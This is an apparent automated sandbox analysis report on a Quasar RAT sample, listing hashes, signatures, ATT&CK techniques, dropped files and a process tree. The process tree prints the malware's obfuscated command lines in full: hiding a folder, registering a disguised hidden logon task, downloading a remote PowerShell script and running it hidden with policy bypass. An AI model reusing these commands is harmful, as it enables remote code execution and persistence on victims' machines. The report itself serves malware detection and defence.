quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
149s
max time network
156s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
19/04/2025, 15:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

winAPI.exe
Size

36.0MB
MD5

fb466528aac78a063f4c60882a33ddc9
SHA1

2af35fa26c27e402e66b7c46d136a4a578f975af
SHA256

6f157135b2b74872f88863cc5bd1edbe8fbe3532dfb9e1b961afca9bb5c77fd3
SHA512

0539f5681271f70262288fcc0b7bd89d63c6c8b8f32f96bd43878df531f9997cde314357f541ca49f58363c484cca80a107b450fd37e3e35e75fd90edac71e77
SSDEEP

393216:f1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYf8:fMguj8Q4VfvwqFTrYCl

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral10/memory/460-56-0x000002B398630000-0x000002B3987BE000-memory.dmp	family_quasar

Blocklisted process makes network request 41 IoCs

flow	pid	Process
2	4384	powershell.exe
4	460	powershell.exe
5	460	powershell.exe
6	460	powershell.exe
16	460	powershell.exe
7	460	powershell.exe
17	460	powershell.exe
18	460	powershell.exe
19	460	powershell.exe
8	460	powershell.exe
9	460	powershell.exe
10	460	powershell.exe
11	460	powershell.exe
12	460	powershell.exe
13	460	powershell.exe
14	460	powershell.exe
15	460	powershell.exe
20	460	powershell.exe
21	460	powershell.exe
22	460	powershell.exe
24	460	powershell.exe
25	460	powershell.exe
26	460	powershell.exe
27	460	powershell.exe
28	460	powershell.exe
29	460	powershell.exe
30	460	powershell.exe
31	460	powershell.exe
32	460	powershell.exe
33	460	powershell.exe
34	460	powershell.exe
35	460	powershell.exe
36	460	powershell.exe
37	460	powershell.exe
38	460	powershell.exe
39	460	powershell.exe
40	460	powershell.exe
41	460	powershell.exe
42	460	powershell.exe
43	460	powershell.exe
44	460	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1500	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
460	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1500	powershell.exe
1500	powershell.exe
4384	powershell.exe
4384	powershell.exe
460	powershell.exe
460	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeIncreaseQuotaPrivilege	1500	powershell.exe
Token: SeSecurityPrivilege	1500	powershell.exe
Token: SeTakeOwnershipPrivilege	1500	powershell.exe
Token: SeLoadDriverPrivilege	1500	powershell.exe
Token: SeSystemProfilePrivilege	1500	powershell.exe
Token: SeSystemtimePrivilege	1500	powershell.exe
Token: SeProfSingleProcessPrivilege	1500	powershell.exe
Token: SeIncBasePriorityPrivilege	1500	powershell.exe
Token: SeCreatePagefilePrivilege	1500	powershell.exe
Token: SeBackupPrivilege	1500	powershell.exe
Token: SeRestorePrivilege	1500	powershell.exe
Token: SeShutdownPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeSystemEnvironmentPrivilege	1500	powershell.exe
Token: SeRemoteShutdownPrivilege	1500	powershell.exe
Token: SeUndockPrivilege	1500	powershell.exe
Token: SeManageVolumePrivilege	1500	powershell.exe
Token: 33	1500	powershell.exe
Token: 34	1500	powershell.exe
Token: 35	1500	powershell.exe
Token: 36	1500	powershell.exe
Token: SeIncreaseQuotaPrivilege	1500	powershell.exe
Token: SeSecurityPrivilege	1500	powershell.exe
Token: SeTakeOwnershipPrivilege	1500	powershell.exe
Token: SeLoadDriverPrivilege	1500	powershell.exe
Token: SeSystemProfilePrivilege	1500	powershell.exe
Token: SeSystemtimePrivilege	1500	powershell.exe
Token: SeProfSingleProcessPrivilege	1500	powershell.exe
Token: SeIncBasePriorityPrivilege	1500	powershell.exe
Token: SeCreatePagefilePrivilege	1500	powershell.exe
Token: SeBackupPrivilege	1500	powershell.exe
Token: SeRestorePrivilege	1500	powershell.exe
Token: SeShutdownPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeSystemEnvironmentPrivilege	1500	powershell.exe
Token: SeRemoteShutdownPrivilege	1500	powershell.exe
Token: SeUndockPrivilege	1500	powershell.exe
Token: SeManageVolumePrivilege	1500	powershell.exe
Token: 33	1500	powershell.exe
Token: 34	1500	powershell.exe
Token: 35	1500	powershell.exe
Token: 36	1500	powershell.exe
Token: SeIncreaseQuotaPrivilege	1500	powershell.exe
Token: SeSecurityPrivilege	1500	powershell.exe
Token: SeTakeOwnershipPrivilege	1500	powershell.exe
Token: SeLoadDriverPrivilege	1500	powershell.exe
Token: SeSystemProfilePrivilege	1500	powershell.exe
Token: SeSystemtimePrivilege	1500	powershell.exe
Token: SeProfSingleProcessPrivilege	1500	powershell.exe
Token: SeIncBasePriorityPrivilege	1500	powershell.exe
Token: SeCreatePagefilePrivilege	1500	powershell.exe
Token: SeBackupPrivilege	1500	powershell.exe
Token: SeRestorePrivilege	1500	powershell.exe
Token: SeShutdownPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeSystemEnvironmentPrivilege	1500	powershell.exe
Token: SeRemoteShutdownPrivilege	1500	powershell.exe
Token: SeUndockPrivilege	1500	powershell.exe
Token: SeManageVolumePrivilege	1500	powershell.exe
Token: 33	1500	powershell.exe
Token: 34	1500	powershell.exe
Token: 35	1500	powershell.exe
Token: 36	1500	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
460	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 5896 wrote to memory of 4724	5896	winAPI.exe	79
PID 5896 wrote to memory of 4724	5896	winAPI.exe	79
PID 4724 wrote to memory of 5840	4724	cmd.exe	80
PID 4724 wrote to memory of 5840	4724	cmd.exe	80
PID 5840 wrote to memory of 2592	5840	cmd.exe	81
PID 5840 wrote to memory of 2592	5840	cmd.exe	81
PID 5840 wrote to memory of 1500	5840	cmd.exe	82
PID 5840 wrote to memory of 1500	5840	cmd.exe	82
PID 5840 wrote to memory of 4384	5840	cmd.exe	84
PID 5840 wrote to memory of 4384	5840	cmd.exe	84
PID 5840 wrote to memory of 460	5840	cmd.exe	85
PID 5840 wrote to memory of 460	5840	cmd.exe	85
PID 460 wrote to memory of 2204	460	powershell.exe	86
PID 460 wrote to memory of 2204	460	powershell.exe	86
PID 2204 wrote to memory of 4976	2204	csc.exe	87
PID 2204 wrote to memory of 4976	2204	csc.exe	87

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2592	attrib.exe

C:\Users\Admin\AppData\Local\Temp\winAPI.exe
"C:\Users\Admin\AppData\Local\Temp\winAPI.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4724
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5840
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
      4⤵
      Views/modifies file attributes
      PID:2592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:4384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:460
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\loetcsmo\loetcsmo.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2204
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES62FB.tmp" "c:\Users\Admin\AppData\Local\Temp\loetcsmo\CSC9C7A97D04C7471C95EDC7DDA8D6E576.TMP"
        6⤵
        
        PID:4976

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
adecdcb123e974a5590782e6c8961995

SHA1
61e048609ede0601ca11892ad4d7a6f24194e132

SHA256
a3a36352abe201f01069f6266146c9c36153951ded82384ba829b33e08108183

SHA512
81bf8263c460de1b0fc15591bf9b54ae9e4c71af8d6a96056b6ef5877211cad6e4de60698300b89497859215b1cf1ece53681827874eaa48c8e20a738fa2ddfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
21d203ab44e0e205154460d96e95f4da

SHA1
6f354686daf7846ebe206593d9f7d4e0378a3f9a

SHA256
529113f8f320bef76872703e4c3bc9d57313ec8c7c69a5072adc548d15a5f93e

SHA512
84f12268012b80a8ae4b6f03e8806d86159ea6d397b522b694b6b530516c73e6ccdaa697316aca840e9a16c82a1d319a74ff51ea5c5884abcc717b956897b82c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES62FB.tmp

Filesize
1KB

MD5
e2e2e52e9fd1c680892e27b0ffb9242b

SHA1
1bda77f2af9de76fe2619130513b047db7a7b274

SHA256
cf3763ceb0ede09467375b6e2a73e5bd5def784b4bb7fab93b20919aba586ebf

SHA512
dc2083fdaaf50710be66b52049ff613393faf2e5c62fa04721fce47d1fd5317716072be9beeed50e013c6d835d108c5e3b179534efcf63e804a6d5d7eca95c4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r2gxusug.y0y.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\loetcsmo\loetcsmo.dll

Filesize
3KB

MD5
2337c19afb0f2816b0a216aeba7679e3

SHA1
5aa1bf8199f1c54aa658f5fd006a5bee23a8c492

SHA256
831b9d5cd7ba5825d5c5fbacc816b5870cfb529b095722d8991510d9a3f4f13e

SHA512
98e9e964762a4f5a71473d565bdb0f42ca4c737cfb2e0dccf6ebd296ae3b6efa3846394265a4751de29a6bab7cd7a95272ab74a3300bf79aa77e0d0ea07600e0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\loetcsmo\CSC9C7A97D04C7471C95EDC7DDA8D6E576.TMP

Filesize
652B

MD5
f6470d446632eabdb0f028c38dd9db48

SHA1
dbdc9b58821f10063d7811065fb75b51a08098d1

SHA256
b9b6df937ffa7f86ebf8a901fadb12902830f46a07fa7800a407350ba143ccd5

SHA512
fea7c29a0d5be0b52f077f09b35087785374b05cd0f8fefcc197f65dd22118671804972f5bf25f1010db13776c1a9e86b62f028b263715ac4001264d97ddc9f0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\loetcsmo\loetcsmo.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\loetcsmo\loetcsmo.cmdline

Filesize
369B

MD5
afa76f2faf431950fd5b7b8390fb7332

SHA1
5fa381ce23844ae6a4ef75ae237b9a0387b5522a

SHA256
c7720d32a08d5f9e524e5bfa7657b3b58aaa6a907545dba7cd7feb77ff47cd46

SHA512
a9430cf91b79d7da00a8992537a210df7d8b637c51e4a4727ec0fa0e28e24968592ad6f503601b44e879ee790ff07555461c6785781e5a69729ef92e61aab81f

Download Submit
memory/460-56-0x000002B398630000-0x000002B3987BE000-memory.dmp

Filesize
1.6MB

Download
memory/460-64-0x000002B398D50000-0x000002B398D9A000-memory.dmp

Filesize
296KB

Download
memory/460-52-0x000002B398000000-0x000002B398008000-memory.dmp

Filesize
32KB

Download
memory/460-59-0x000002B3985C0000-0x000002B3985FA000-memory.dmp

Filesize
232KB

Download
memory/460-57-0x000002B3984B0000-0x000002B3984CA000-memory.dmp

Filesize
104KB

Download
memory/460-60-0x000002B3F50E0000-0x000002B3F5130000-memory.dmp

Filesize
320KB

Download
memory/460-63-0x000002B398D00000-0x000002B398D4C000-memory.dmp

Filesize
304KB

Download
memory/460-54-0x000002B398020000-0x000002B39818A000-memory.dmp

Filesize
1.4MB

Download
memory/460-65-0x000002B398600000-0x000002B39862A000-memory.dmp

Filesize
168KB

Download
memory/460-58-0x000002B3985B0000-0x000002B3985C2000-memory.dmp

Filesize
72KB

Download
memory/460-62-0x000002B398CB0000-0x000002B398CFE000-memory.dmp

Filesize
312KB

Download
memory/460-61-0x000002B3F51F0000-0x000002B3F52A2000-memory.dmp

Filesize
712KB

Download
memory/1500-4-0x000001D07FB30000-0x000001D07FB52000-memory.dmp

Filesize
136KB

Download
memory/1500-13-0x00007FFC844F0000-0x00007FFC84FB2000-memory.dmp

Filesize
10.8MB

Download
memory/1500-14-0x00007FFC844F0000-0x00007FFC84FB2000-memory.dmp

Filesize
10.8MB

Download
memory/1500-17-0x00007FFC844F0000-0x00007FFC84FB2000-memory.dmp

Filesize
10.8MB

Download
memory/1500-3-0x00007FFC844F3000-0x00007FFC844F5000-memory.dmp

Filesize
8KB

Download